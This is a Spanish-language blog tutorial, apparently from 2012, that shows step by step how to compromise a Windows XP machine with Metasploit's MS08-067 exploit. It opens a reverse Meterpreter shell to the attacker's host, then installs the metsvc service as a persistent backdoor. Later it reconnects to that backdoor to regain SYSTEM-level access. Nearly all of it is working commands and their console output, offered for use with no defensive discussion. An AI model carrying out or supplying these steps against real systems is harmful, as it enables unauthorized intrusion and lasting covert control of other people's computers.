Metasploit, permanent backdoor

En un post anterior enseñamos cómo poder aprovechar un bug para acceder a un Windows y tomar el control del mismo. Una vez dentro lo que realmente interesará será poder continuar accediendo a él. A los largo de este post, haremos justamente eso, dejaremos un pequeño backdoor ahí instalado y que permita volver a establecer conexiones con el equipo cuando nos interese.
Primeramente estableceremos conexión aprovechándonos de algún bug que tenga el equipo remoto. Aquí lo detallo muy rápidamente, pues ya lo vimos.
msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi)> show options
msf  exploit(ms08_067_netapi)> set RHOST 192.168.1.42
RHOST => 192.168.1.42
msf  exploit(ms08_067_netapi)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi)> set LHOST 192.168.1.33
LHOST => 192.168.1.33
msf  exploit(ms08_067_netapi)> exploit

[*] Started reverse handler on 192.168.1.33:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.42
[*] Meterpreter session 1 opened (192.168.1.33:4444 -> 192.168.1.42:2940) at 2012-02-07 19:47:33 +0100

meterpreter> p0wned
Ya tenemos acceso al equipo y podemos hacer lo que nos plazca. Ahora lo que tocará será asegurarnos de que lo volvamos a tener cuando queramos o cuando el equipo se reinicie. Para hacer esto, lo que vamos a hacer es instalar un pequeño servidor de meterpreter en el equipo de la víctima, con el que luego nos podremos comunicar. Para hacerlo, simplemente,
meterpreter> run metsvc
[*] Creating a meterpreter service on port 3133
[*] Creating a temporary installation directory C:\WINDOWS\TEMP\ABoHpQTSPiHj...
[*]  >> Uploading metsrv.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
  * Installing service metsvc
 * Starting service
Service metsvc successfully installed.
Y luego ya podemos salir del equipos, pues ya dejamos un puerta que está a la escucha y nos permitirá acceder a él.
meterpreter> exit
[*] Shutting down Meterpreter...

[*] Meterpreter session 1 closed.  Reason: User exit
Ahora, cuando nos interesa acceder al sistema, únicamente habrá que conectar con él equipo desde el propio metasploit nuevamente. Como la IP ya la sabemos, simplemente,
msf > use exploit/multi/handler
msf  exploit(handler)> set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf  exploit(handler)> set LPORT 3133
LPORT => 3133
msf  exploit(handler)> set RHOST 192.168.1.42
RHOST => 192.168.1.42
msf  exploit(handler)> set EXITFUNC thread
EXITFUNC => thread
msf  exploit(handler)> show options

Module options (exploit/multi/handler):

Name  Setting         Required Description
----  -------         -------- -----------

Payload options (windows/metsvc_bind_tcp):

Name     Setting      Required Description
----     -------      -------- -----------
EXITFUNC thread       yes      Exit technique: seh, thread, process, none
LPORT    3133         yes      The listen port
RHOST    192.168.1.42 no       The target address

Exploit target:

Id  Name
--  ----
0   Wildcard Target

msf  exploit(handler)> exploit

[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.1.33:43057 -> 192.168.1.42:3133) at 2012-02-16 21:47:22 +0100

meterpreter >pwd
C:\WINDOWS\system32
meterpreter >getuid
Server username: NT AUTHORITY\SYSTEM


1 comentario :

Formulario de contacto

Nombre

Correo electrónico *

Mensaje *

Últimos comentarios